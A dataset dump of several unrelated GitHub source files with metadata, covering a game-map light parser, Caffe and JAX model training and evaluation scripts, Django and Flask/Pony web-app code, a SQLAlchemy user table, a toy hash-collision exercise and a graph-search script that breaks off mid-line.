"file_size_in_byte": 433, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.createTutor", "line_number": 7, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "views.findTutor", "line_number": 8, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.createMessage", "line_number": 9, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "views.displayMessages", "line_number": 10, "usage_type": "argument"}]} +{"seq_id": "45560671076", "text": "from enum import IntEnum\n\nimport math\n\nfrom .primitive import Primitive\nfrom ..lumps.texture_lump import TextureInfoLump\nfrom ....utilities.byte_io_mdl import ByteIO\n\n\nclass EmitType(IntEnum):\n emit_surface = 0 # 90 degree spotlight\n emit_point = 1 # simple point light source\n emit_spotlight = 2 # spotlight with penumbra\n emit_skylight = 3 # directional light with no falloff (surface must trace to SKY texture)\n emit_quakelight = 4 # linear falloff, non-lambertian\n emit_skyambient = 5 # spherical light source with no falloff (surface must trace to SKY texture)\n\n\nclass Color32:\n\n def __init__(self):\n self.r, self.g, self.b, self.a = 1, 1, 1, 1\n\n @staticmethod\n def from_array(rgba):\n color = Color32()\n if len(rgba) >= 4:\n color.r, color.g, color.b, color.a = rgba\n color.r, color.g, color.b = rgba\n return color\n\n def magnitude(self):\n magn = math.sqrt(self.r ** 2 + self.g ** 2 + self.b ** 2)\n return magn\n\n def normalize(self):\n magn = self.magnitude()\n if magn == 0:\n return self\n self.r = self.r / magn\n self.g = self.g / magn\n self.b = self.b / magn\n return self\n\n def normalized(self):\n magn = self.magnitude()\n if magn == 0:\n return self\n color = Color32()\n color.r = self.r / magn\n color.g = self.g / magn\n color.b = self.b / magn\n return color\n\n def __repr__(self):\n magn = self.magnitude()\n if magn == 0:\n return self\n r = self.r / magn\n g = self.g / magn\n b = self.b / magn\n return \"<Color R:{} G:{} B:{}>\".format(r, g, b)\n\n @property\n def rgba(self):\n return self.r, self.g, self.b, self.a\n\n @property\n def rgb(self):\n return self.r, self.g, self.b\n\n\nclass WorldLight(Primitive):\n def __init__(self, lump, bsp):\n super().__init__(lump, bsp)\n self.origin = []\n self.intensity = Color32()\n self.normal = []\n self.shadow_cast_offset = []\n self.cluster = 0\n self.type = []\n self.style = 0\n self.stopdot = 0.0\n self.stopdot2 = 0.0\n self.exponent = 0.0\n self.radius = 0.0\n self.constant_attn = 0.0\n self.linear_attn = 0.0\n self.quadratic_attn = 0.0\n self.flags = 0\n self.tex_info_id = 0\n self.owner = 0\n\n def parse(self, reader: ByteIO):\n self.origin = reader.read_fmt('3f')\n self.intensity = Color32.from_array(reader.read_fmt('3f'))\n self.normal = reader.read_fmt('3f')\n if self._bsp.version > 20:\n self.shadow_cast_offset = reader.read_fmt('3f')\n self.cluster = reader.read_int32()\n self.type = EmitType(reader.read_int32())\n self.style = reader.read_int32()\n self.stopdot = reader.read_float()\n self.stopdot2 = reader.read_float()\n self.exponent = reader.read_float()\n self.radius = reader.read_float()\n self.constant_attn = reader.read_float()\n self.linear_attn = reader.read_float()\n self.quadratic_attn = reader.read_float()\n self.flags = reader.read_int32()\n self.tex_info_id = reader.read_int32()\n self.owner = reader.read_int32()\n return self\n\n @property\n def tex_info(self):\n tex_info_lump: TextureInfoLump = self._bsp.get_lump('LUMP_TEXINFO')\n if tex_info_lump:\n tex_infos = tex_info_lump.texture_info\n return tex_infos[self.tex_info_id]\n return None\n\n @property\n def tex_data(self):\n return self.tex_info.tex_data if self.tex_info else None\n", "repo_name": "stepa2/SourceIO", "sub_path": "source1/bsp/datatypes/world_light.py", "file_name": "world_light.py", "file_ext": "py", "file_size_in_byte": 3695, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "enum.IntEnum", "line_number": 10, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 33, "usage_type": "call"}, {"api_name": "primitive.Primitive", "line_number": 73, "usage_type": "name"}, {"api_name": "utilities.byte_io_mdl.ByteIO", "line_number": 94, "usage_type": "name"}, {"api_name": "lumps.texture_lump.TextureInfoLump", "line_number": 117, "usage_type": "name"}]} +{"seq_id": "3590626652", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n\nimport numpy as np\nimport cv2\nimport caffe\ncaffe.set_mode_cpu()\n\nmodel_def = '/home/huangrq/vivworkspace/VehicleBack_base_batchsize1_test/VehicleBack.prototxt'\nmodel_weights = '/home/huangrq/vivworkspace/VehicleBack_base_batchsize1_test/VehicleBack.caffemodel' \nnet = caffe.Net(model_def,model_weights,caffe.TEST) \n\ntransformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})\n\n\ntransformer.set_transpose('data', (2,0,1)) #将图像的通道数设置为outermost的维数\ntransformer.set_mean('data', np.array([127.5,127.5,127.5])) #\ntransformer.set_raw_scale('data', 255) #将像素值从[0,255]变换到[-1,1]之间\ntransformer.set_channel_swap('data', (2,1,0)) #交换通道,从RGB变换到BGR\n\n\n\nprint(\"###############################################################\")\nfilename_label = \"/home/huangrq/vivworkspace/VehicleBack_base_batchsize1_test/test_list_w.txt\"\nfile_out=\"/home/huangrq/vivworkspace/VehicleBack_base_batchsize1_test/AC_oncaffe_out.txt\"\nfp = open(filename_label)\nfpout = open(file_out,'w')\nfiledata=fp.readlines()\nfp.close()\nfilepath = list(map(lambda x:x.strip().split()[0],filedata))\nlabel_color=list(map(lambda x:int(x.strip().split()[1]),filedata))\nlabel_model=list(map(lambda x:int(x.strip().split()[2]),filedata))\nlabel_type=list(map(lambda x:int(x.strip().split()[3]),filedata))\nprint(label_color)\n\nmodel_statistic=[0 for i in range(10)]\nfor item in label_model:\n for i in range(10):\n if i==item:\n model_statistic[i] += 1\n break\nprint(label_model)\ncolor_statistic=[0 for i in range(11)]\nfor item in label_color:\n for i in range(11):\n if i==item:\n color_statistic[i] += 1\n break\nprint(color_statistic,'\\n',model_statistic)\nmodel,color,types=[],[],[]\n\nfor item in filepath:\n\n image=caffe.io.load_image('/home/huangrq/vivworkspace/VehicleBack_base_batchsize1_test/'+item)\n transformed_image=transformer.preprocess('data',image)\n transformed_image = transformed_image/127.5\n\n net.blobs['data'].data[...] = transformed_image\n out_put = net.forward()\n\n \n model.append(out_put['prob_model'].argmax())\n color.append(out_put['prob_color'].argmax())\n types.append(out_put['prob_type'].argmax())\n\n\n\nout_result=list(map(lambda x,y,z,w:w+' model: '+str(x)+' color: '+str(y)+' type: '+str(z)+'\\n',model,color,types,filepath))\nfpout.writelines(out_result)\n\nfpout.close()\n\n\n\n'''\ncompare label and predict\n'''\n\nfrom functools import reduce\nfilename_label = \"/home/huangrq/vivworkspace/VehicleBack_base_batchsize1_test/test_list_w.txt\"\nfile_out=\"/home/huangrq/vivworkspace/VehicleBack_base_batchsize1_test/AC_oncaffe_out.txt\"\nlabel_fp = open(filename_label)\npredict_fp = open(file_out)\nlabel_filedata=label_fp.readlines()\npredict_filedata=predict_fp.readlines()\nlabel_fp.close()\npredict_fp.close()\n\nlabel_filepath = list(map(lambda x:x.strip().split()[0],label_filedata))\nlabel_color=list(map(lambda x:int(x.strip().split()[1]),label_filedata))\nlabel_model=list(map(lambda x:int(x.strip().split()[2]),label_filedata))\nlabel_type=list(map(lambda x:int(x.strip().split()[3]),label_filedata))\n\npredict_filepath = list(map(lambda x:x.strip().split()[0],predict_filedata))\npredict_color=list(map(lambda x:int(x.strip().split()[4]),predict_filedata))\npredict_model=list(map(lambda x:int(x.strip().split()[6]),predict_filedata))\npredict_type=list(map(lambda x:int(x.strip().split()[2]),predict_filedata))\n\nprint(predict_type[4])\nprint(label_type[4])\n\ncolor_match_list=list(map(lambda x,y:x==y,label_color,predict_color))\nmodel_match_list=list(map(lambda x,y:x==y,label_model,predict_model))\ntype_match_list=list(map(lambda x,y:x==y,label_type,predict_type))\n\ncolor_match_num = reduce(lambda x,y:x+y,color_match_list)\nmodel_match_num = reduce(lambda x,y:x+y,model_match_list)\ntype_match_num = reduce(lambda x,y:x+y,type_match_list)\n\nprint(color_match_num,model_match_num,type_match_num)", "repo_name": "Heyrenqiang/work", "sub_path": "scripts/AC_oncaffe_for_VehicleBack.py", "file_name": "AC_oncaffe_for_VehicleBack.py", "file_ext": "py", "file_size_in_byte": 3958, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "caffe.set_mode_cpu", "line_number": 8, "usage_type": "call"}, {"api_name": "caffe.Net", "line_number": 12, "usage_type": "call"}, {"api_name": "caffe.TEST", "line_number": 12, "usage_type": "attribute"}, {"api_name": "caffe.io.Transformer", "line_number": 14, "usage_type": "call"}, {"api_name": "caffe.io", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "caffe.io.load_image", "line_number": 55, "usage_type": "call"}, {"api_name": "caffe.io", "line_number": 55, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 107, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 108, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 109, "usage_type": "call"}]} +{"seq_id": "35332492235", "text": "from django.test import TestCase\nfrom django.urls import reverse\n\nfrom .models.author import Author\nfrom .models.book import Book\nfrom .models.category import Category\n\n\nclass ProductTests(TestCase):\n def setUp(self):\n self.author = Author.objects.create(\n first_name='جورج',\n last_name='اورول',\n slug='جورج-اورول',\n )\n self.category = Category.objects.create(\n name='تخیلی',\n slug='تخیلی',\n )\n self.book = Book.objects.create(\n title='قلعه حیوانات',\n number_in_stock='3',\n unit_price='30000',\n slug='قلعه-حیوانات',\n )\n self.book.authors.add(self.author)\n self.book.categories.add(self.category)\n\n def test_string_check(self):\n self.assertEqual(str(self.book), self.book.title)\n\n def test_book_content(self):\n self.assertEqual(self.book.authors.all().first(), self.author)\n self.assertEqual(self.book.categories.all().first(), self.category)\n\n def test_product_home_view(self):\n response = self.client.get(reverse('home'))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'home.html')\n\n # def test_get_absolute_url_book(self):\n # self.assertEqual(self.book.get_absolute_url(), f'/book/{self.book.slug}/')\n\n def test_book_delete_view(self):\n response = self.client.post(\n reverse('book_delete', args=[self.book.id, ]))\n self.assertEqual(response.status_code, 302)\n", "repo_name": "MaryamHoushyari/Book-Store", "sub_path": "BookStoreSrc/product/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 1591, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 9, "usage_type": "name"}, {"api_name": "models.author.Author.objects.create", "line_number": 11, "usage_type": "call"}, {"api_name": "models.author.Author.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "models.author.Author", "line_number": 11, "usage_type": "name"}, {"api_name": "models.category.Category.objects.create", "line_number": 16, "usage_type": "call"}, {"api_name": "models.category.Category.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.category.Category", "line_number": 16, "usage_type": "name"}, {"api_name": "models.book.Book.objects.create", "line_number": 20, "usage_type": "call"}, {"api_name": "models.book.Book.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.book.Book", "line_number": 20, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 37, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "40492781111", "text": "from persistance.persistance import db\nfrom core.models import Student, Lesson\n\nfrom flask import jsonify, abort\nfrom pony.orm import *\nfrom pony.orm.serialization import to_dict\nfrom datetime import datetime, date, timedelta\n\nfrom core.schemas import StudentSchema, LessonSchema\n\n\n@db_session\ndef get_students_list():\n '''Retorna uma lista de dicts com informções de cada aluno'''\n\n students = Student.select()\n schema = StudentSchema(many=True)\n return schema.dump(list(students)).data\n\n\n@db_session\ndef get_student(id: int):\n \"\"\"Retorna um aluno dado um ID\"\"\"\n try:\n stud = Student[id]\n if stud:\n # Deserializa objeto através do InstructorSchema\n schema = StudentSchema()\n return schema.dump(stud).data\n except ObjectNotFound:\n abort(404)\n\n\n@db_session\ndef insert_new_student(name: str, address: str, birth_date: date, courseDuration: int, email: str, password: str):\n flightTimeZero = timedelta(days=0, seconds=0, microseconds=0,\n milliseconds=0, minutes=0, hours=0, weeks=0)\n\n if((Student.get(email=email)) != None):\n abort(400, 'Email já cadastrado')\n\n stud = Student(name=name, address=address, email=email, password=password,\n birth_date=birth_date, flightTime=flightTimeZero,\n licenseAvailable=False, courseDuration=courseDuration)\n\n commit()\n\n return {\"endpoint\": \"api/students/\" + str(stud.ID)}\n\n\n@db_session\ndef delete_student(ID: int):\n '''Given an ID, remove a student'''\n\n try:\n stud = Student[ID]\n if stud:\n stud.delete()\n commit()\n return 'Aluno removido com sucesso!'\n except ObjectNotFound:\n abort(404)\n\n\n@db_session\ndef update_student(id, **args):\n\n # nem sempre deseja-se alterar todos os parâmetros, por isso uso o dict **args\n # o args só vai conter os campos que eu desejo alterar\n\n try: # verifica-se, inicialmente se o instrutor consta no BD\n stud = Student[id]\n except ObjectNotFound:\n abort(404)\n # altera somente os argumentos cujas chaves estão explícitas no args\n stud.set(**args)\n commit()\n return {\"endpoint\": \"/api/students/\" + str(stud.ID)}\n\n\n@db_session\ndef update_flightTime(id: int, timeToAdd: timedelta):\n stud = Student[id]\n stud.flightTime += timeToAdd\n\n # flightTime está em segundo e courseDuration em horas\n if(stud.flightTime >= timedelta(seconds=3600*stud.courseDuration)):\n stud.set(licenseAvailable=True)\n commit()\n\n\n@db_session\ndef get_lesson_list(id: int):\n lessons = []\n lesson_query = Lesson.select()\n try: # verifica-se, inicialmente se o instrutor consta no BD\n stud = Student[id]\n except ObjectNotFound:\n abort(404)\n\n for l in lesson_query:\n if l.student.ID == id:\n e_s = l.expected_start.strftime('%H:%M:%S')\n e_f = l.expected_finish.strftime('%H:%M:%S')\n lessons.append(l)\n schema = LessonSchema(many=True)\n return schema.dump(list(lessons)).data\n", "repo_name": "douglasramos/pcs3443-escola-aviacao", "sub_path": "src/application/student/use_cases.py", "file_name": "use_cases.py", "file_ext": "py", "file_size_in_byte": 3076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "core.models.Student.select", "line_number": 16, "usage_type": "call"}, {"api_name": "core.models.Student", "line_number": 16, "usage_type": "name"}, {"api_name": "core.schemas.StudentSchema", "line_number": 17, "usage_type": "call"}, {"api_name": "core.models.Student", "line_number": 25, "usage_type": "name"}, {"api_name": "core.schemas.StudentSchema", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 35, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 36, "usage_type": "call"}, {"api_name": "core.models.Student.get", "line_number": 39, "usage_type": "call"}, {"api_name": "core.models.Student", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 40, "usage_type": "call"}, {"api_name": "core.models.Student", "line_number": 42, "usage_type": "call"}, {"api_name": "core.models.Student", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 62, "usage_type": "call"}, {"api_name": "core.models.Student", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 82, "usage_type": "name"}, {"api_name": "core.models.Student", "line_number": 83, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 87, "usage_type": "call"}, {"api_name": "core.models.Lesson.select", "line_number": 95, "usage_type": "call"}, {"api_name": "core.models.Lesson", "line_number": 95, "usage_type": "name"}, {"api_name": "core.models.Student", "line_number": 97, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 99, "usage_type": "call"}, {"api_name": "core.schemas.LessonSchema", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "29425833192", "text": "from clu import metrics\nfrom flax.training import train_state\nfrom flax import struct\nimport optax\nimport jax.numpy as jnp\nimport jax\nimport tensorflow_datasets as tfds\nimport tensorflow as tf\nfrom cnn_jax_flax import ConvNet\n\n\n@struct.dataclass\nclass Metrics(metrics.Collection):\n accuracy: metrics.Accuracy\n loss: metrics.Average.from_output(\"loss\")\n\n\nclass TrainState(train_state.TrainState):\n metrics: Metrics\n\n\ndef get_datasets(num_epochs, batch_size):\n train_ds = tfds.load(\"mnist\", split=\"train\")\n test_ds = tfds.load(\"mnist\", split=\"test\")\n\n train_ds = train_ds.map(\n lambda sample: {\n \"image\": tf.cast(sample[\"image\"], tf.float32) / 255.0,\n \"label\": sample[\"label\"],\n }\n )\n test_ds = test_ds.map(\n lambda sample: {\n \"image\": tf.cast(sample[\"image\"], tf.float32) / 255.0,\n \"label\": sample[\"label\"],\n }\n )\n train_ds = train_ds.repeat(num_epochs).shuffle(1024)\n train_ds = train_ds.batch(batch_size, drop_remainder=True).prefetch(1)\n test_ds = test_ds.shuffle(1024)\n test_ds = test_ds.batch(batch_size, drop_remainder=True).prefetch(1)\n\n return train_ds, test_ds\n\n\ndef create_train_state(module, rng, learning_rate, momentum):\n params = module.init(rng, jnp.ones([1, 28, 28, 1]))[\"params\"]\n tx = optax.sgd(learning_rate, momentum)\n return TrainState.create(\n apply_fn=module.apply, params=params, tx=tx, metrics=Metrics.empty()\n )\n\n\n@jax.jit\ndef train_step(state, batch):\n def loss_fn(params):\n logits = state.apply_fn({\"params\": params}, batch[\"image\"])\n loss = optax.softmax_cross_entropy_with_integer_labels(\n logits=logits, labels=batch[\"label\"]\n ).mean()\n return loss\n\n grad_fn = jax.grad(loss_fn)\n grads = grad_fn(state.params)\n state = state.apply_gradients(grads=grads)\n return state\n\n\n@jax.jit\ndef compute_metrics(*, state, batch):\n logits = state.apply_fn({\"params\": state.params}, batch[\"image\"])\n loss = optax.softmax_cross_entropy_with_integer_labels(\n logits=logits, labels=batch[\"label\"]\n ).mean()\n metric_updates = state.metrics.single_from_model_output(\n logits=logits, labels=batch[\"label\"], loss=loss\n )\n metrics = state.metrics.merge(metric_updates)\n state = state.replace(metrics=metrics)\n return state\n\n\nif __name__ == \"__main__\":\n num_epochs = 10\n batch_size = 32\n\n train_ds, test_ds = get_datasets(num_epochs, batch_size)\n\n tf.random.set_seed(0)\n init_rng = jax.random.PRNGKey(0)\n\n learning_rate = 0.01\n momentum = 0.9\n\n cnn = ConvNet()\n state = create_train_state(cnn, init_rng, learning_rate, momentum)\n\n # Training\n num_steps_per_epoch = train_ds.cardinality().numpy() // num_epochs\n metrics_history = {\n \"train_loss\": [],\n \"train_accuracy\": [],\n \"test_loss\": [],\n \"test_accuracy\": [],\n }\n for step, batch in enumerate(train_ds.as_numpy_iterator()):\n state = train_step(state, batch)\n state = compute_metrics(state=state, batch=batch)\n\n if (step + 1) % num_steps_per_epoch == 0:\n for metric, value in state.metrics.compute().items():\n metrics_history[f\"train_{metric}\"].append(value)\n state = state.replace(metrics=state.metrics.empty())\n\n test_state = state\n for test_batch in test_ds.as_numpy_iterator():\n test_state = compute_metrics(state=test_state, batch=test_batch)\n\n for metric, value in test_state.metrics.compute().items():\n metrics_history[f\"test_{metric}\"].append(value)\n\n print(\n f\"train epoch: {(step+1) // num_steps_per_epoch}, \"\n f\"loss: {metrics_history['train_loss'][-1]}, \"\n f\"accuracy: {metrics_history['train_accuracy'][-1] * 100}\"\n )\n print(\n f\"test epoch: {(step+1) // num_steps_per_epoch}, \"\n f\"loss: {metrics_history['test_loss'][-1]}, \"\n f\"accuracy: {metrics_history['test_accuracy'][-1] * 100}\"\n )\n", "repo_name": "satojkovic/cnn-jax-flax", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 4108, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "clu.metrics.Collection", "line_number": 13, "usage_type": "attribute"}, {"api_name": "clu.metrics", "line_number": 13, "usage_type": "name"}, {"api_name": "clu.metrics.Accuracy", "line_number": 14, "usage_type": "attribute"}, {"api_name": "clu.metrics", "line_number": 14, "usage_type": "name"}, {"api_name": "clu.metrics.Average.from_output", "line_number": 15, "usage_type": "call"}, {"api_name": "clu.metrics.Average", "line_number": 15, "usage_type": "attribute"}, {"api_name": "clu.metrics", "line_number": 15, "usage_type": "name"}, {"api_name": "flax.struct.dataclass", "line_number": 12, "usage_type": "attribute"}, {"api_name": "flax.struct", "line_number": 12, "usage_type": "name"}, {"api_name": "flax.training.train_state.TrainState", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flax.training.train_state", "line_number": 18, "usage_type": "name"}, {"api_name": "clu.metrics", "line_number": 19, "usage_type": "name"}, {"api_name": "tensorflow_datasets.load", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow_datasets.load", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 34, "usage_type": "attribute"}, {"api_name": "jax.numpy.ones", "line_number": 47, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 47, "usage_type": "name"}, {"api_name": "optax.sgd", "line_number": 48, "usage_type": "call"}, {"api_name": "optax.softmax_cross_entropy_with_integer_labels", "line_number": 58, "usage_type": "call"}, {"api_name": "jax.grad", "line_number": 63, "usage_type": "call"}, {"api_name": "jax.jit", "line_number": 54, "usage_type": "attribute"}, {"api_name": "optax.softmax_cross_entropy_with_integer_labels", "line_number": 72, "usage_type": "call"}, {"api_name": "clu.metrics", "line_number": 78, "usage_type": "name"}, {"api_name": "clu.metrics", "line_number": 79, "usage_type": "name"}, {"api_name": "jax.jit", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.random.set_seed", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 89, "usage_type": "attribute"}, {"api_name": "jax.random.PRNGKey", "line_number": 90, "usage_type": "call"}, {"api_name": "jax.random", "line_number": 90, "usage_type": "attribute"}, {"api_name": "cnn_jax_flax.ConvNet", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "21969777354", "text": "from typing import Optional\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import update, delete\nfrom sqlalchemy.orm import sessionmaker\n\nfrom utils.db_api.base import Base\nfrom utils.db_api.models import Users\n\ndb_string = r\"sqlite:///database.db\"\ndb = create_engine(db_string) \n\nSession = sessionmaker(db) \nsession = Session()\n\nBase.metadata.create_all(db)\n\n\nclass Database:\n # ---Users---\n def reg_user(self, user_id: str, username: str, name: str, insta: str, contact: str):\n \"\"\"Some docs\"\"\"\n session.merge(Users(user_id = user_id, \n username = username,\n name = name,\n insta = insta,\n contact = contact\n )\n )\n session.commit()\n \n\n def get_user(self, user_id) -> Users:\n \"\"\"Some docs\"\"\"\n response = session.query(Users).filter(Users.user_id == user_id).first()\n return response\n\n \n def update_status(self, user_id):\n \"\"\"Some docs\"\"\"\n session.execute(\n update(Users).filter(Users.user_id == user_id).\n values(status = 'payed')\n )\n session.commit()\n \n\n def get_row_count(self):\n response = session.query(Users).count()\n return response", "repo_name": "KarimovMurodilla/secret-channel", "sub_path": "utils/misc/connection.py", "file_name": "connection.py", "file_ext": "py", "file_size_in_byte": 1341, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 12, "usage_type": "call"}, {"api_name": "utils.db_api.base.Base.metadata.create_all", "line_number": 15, "usage_type": "call"}, {"api_name": "utils.db_api.base.Base.metadata", "line_number": 15, "usage_type": "attribute"}, {"api_name": "utils.db_api.base.Base", "line_number": 15, "usage_type": "name"}, {"api_name": "utils.db_api.models.Users", "line_number": 22, "usage_type": "call"}, {"api_name": "utils.db_api.models.Users", "line_number": 34, "usage_type": "argument"}, {"api_name": "utils.db_api.models.Users.user_id", "line_number": 34, "usage_type": "attribute"}, {"api_name": "utils.db_api.models.Users", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlalchemy.update", "line_number": 41, "usage_type": "call"}, {"api_name": "utils.db_api.models.Users", "line_number": 41, "usage_type": "argument"}, {"api_name": "utils.db_api.models.Users.user_id", "line_number": 41, "usage_type": "attribute"}, {"api_name": "utils.db_api.models.Users", "line_number": 48, "usage_type": "argument"}]} +{"seq_id": "34994781660", "text": "\"\"\"\nImplement a hash function simple_hash that given a string s,\ncomputes its hash as follows:\nit starts with r = 7, and for every character in the string,\nmultiplies r by 31,\nadds that character to r,\nand keeps everything modulo 2 power 16.\n\"\"\"\n\n\nfrom string import ascii_lowercase\nimport itertools\n\nlorem = \"\"\"\nLorem ipsum dolor sit amet, consectetur adipiscing elit.\nDonec id sem magna. Nunc fermentum nisl et justo ullamcorper luctus.\nPhasellus metus magna, ornare at laoreet sit amet, rutrum efficitur dui.\nVivamus ut eleifend ante.\nPhasellus sodales nec risus sit amet viverra.\nFusce id viverra lectus, eu rutrum ex. Suspendisse pulvinar. tttt\n\"\"\"\npower = pow(2, 16)\n\n\ndef simple_hash(s):\n r = 7\n for char in s:\n r = r * 31\n r = r + ord(char)\n return r % power\n\n\ndef simple_crack(hash, lorem):\n # with 2 ** 16 solutions, ascii_lowercase, repeat=5 is large enough.\n test_list = [\"\".join(item) for item in itertools.product(ascii_lowercase, repeat=5)]\n for item in test_list:\n output = simple_hash(item)\n if output == hash and item != lorem:\n return output, item\n\n\nif __name__ == \"__main__\":\n lorem = lorem\n hash = simple_hash(lorem)\n print(\"Value lorem:\", hash)\n\n output, item = simple_crack(hash, lorem)\n print(output, item)\n", "repo_name": "Fabrice-64/cours_tel_aviv", "sub_path": "12_hashing_algo.py", "file_name": "12_hashing_algo.py", "file_ext": "py", "file_size_in_byte": 1303, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "itertools.product", "line_number": 35, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 35, "usage_type": "argument"}]} +{"seq_id": "9541896747", "text": "import itertools,numpy\nimport sys\nsys.path.insert(0, '/Users/yli/code/conway99')\nfrom conway99 import *\nimport numpy as np\n\ndef initial_vertex_clusters(b):\n vertex_clusters = itertools.product(range(3),[0,1],[0,1])\n return vertex_clusters\n\n#测试某点的兄弟是否已经匹配到同一大组,是则返回False\ndef test_sibling_group(current_vertex, vertex_for_test):\n if current_vertex[2] == 0:\n sibling_vertex = (current_vertex[0], current_vertex[1], 1)\n else:\n sibling_vertex = (current_vertex[0], current_vertex[1], 0)\n #print(\"the sibling for test is: %s\" % str(sibling_vertex))\n #print(\"current solution stack is %s\" % str(current_solution_stack))\n for vertex_group in current_solution_stack:\n #print(\"the group in current stack is: %s\" % str(vertex_group))\n if vertex_group[0] == sibling_vertex and vertex_group[1][0] == \\\n vertex_for_test[0] or vertex_group[1] == sibling_vertex and \\\n vertex_group[0][0] == vertex_for_test[0]:\n return False\n return True\n\ndef search_next_group_vertex():\n if len(pending_vertex) <= 1:\n return None\n vertex_for_group = pending_vertex[0]\n for vertex in pending_vertex[1:]:\n if vertex > last_matched_vertex[vertex_for_group] and vertex[0] != vertex_for_group[0] and test_sibling_group(vertex_for_group, vertex): # 两点大组不同\n return (vertex_for_group, vertex)\n if last_matched_vertex[vertex_for_group] != (-1,-1,-1):\n return (vertex_for_group, last_matched_vertex[vertex_for_group])\n else:\n return None\n\ndef test_solution():\n adjancent_matrix = gen_adjacent_matrix()\n if lambda_compatible(adjancent_matrix) and \\\n mu_compatible(adjancent_matrix) and \\\n meets_adjacency_requirements(adjancent_matrix, debug=True) and \\\n graph_is_valid(adjancent_matrix):\n return True\n else:\n return False\n\ndef gen_adjacent_matrix():\n adjacent_matrix = numpy.empty((9,9),dtype='int')\n for i in range(9):\n for j in range(9):\n adjacent_matrix[i,j] = 0\n vertex_to_matrix_index = {}\n\n #初始化各点在图中的序号,solution的第一个序号为3\n i = 3\n for vertex_group in current_solution_stack:\n vertex_to_matrix_index[vertex_group[0]] = i\n vertex_to_matrix_index[vertex_group[1]] = i\n i += 1\n #print(vertex_to_matrix_index)\n\n for vertex_group in current_solution_stack:\n #print(vertex_group)\n v1 = vertex_group[0]\n v2 = vertex_group[1]\n index = vertex_to_matrix_index[v1]\n\n adjacent_matrix[index, v1[0]] = 1\n adjacent_matrix[v1[0], index] = 1\n adjacent_matrix[index, v2[0]] = 1\n adjacent_matrix[v2[0], index] = 1\n\n adjacent_matrix[index, vertex_to_matrix_index[vertex_to_sibling[v1]]] = 1\n adjacent_matrix[vertex_to_matrix_index[vertex_to_sibling[v1]], index] = 1\n adjacent_matrix[index, vertex_to_matrix_index[vertex_to_sibling[v2]]] = 1\n adjacent_matrix[vertex_to_matrix_index[vertex_to_sibling[v2]], index] = 1\n return adjacent_matrix\n\n\n#初始化工作\nsrg = (9,4,1,2)\nv = srg[0]\nk = srg[1]\nlbd = srg[2]\nmu = srg[3]\n\n#初始块数\nblock_count = v // ( 2 + lbd )\n\nlast_matched_vertex = {}\nvertex_to_sibling = {}\n\npending_vertex = list(initial_vertex_clusters(block_count))\nprint(pending_vertex)\nindex = v // block_count\nfor vertex in pending_vertex:\n vertex_to_sibling[vertex] = (vertex[0], vertex[1], 0 if vertex[2] == 1\n else 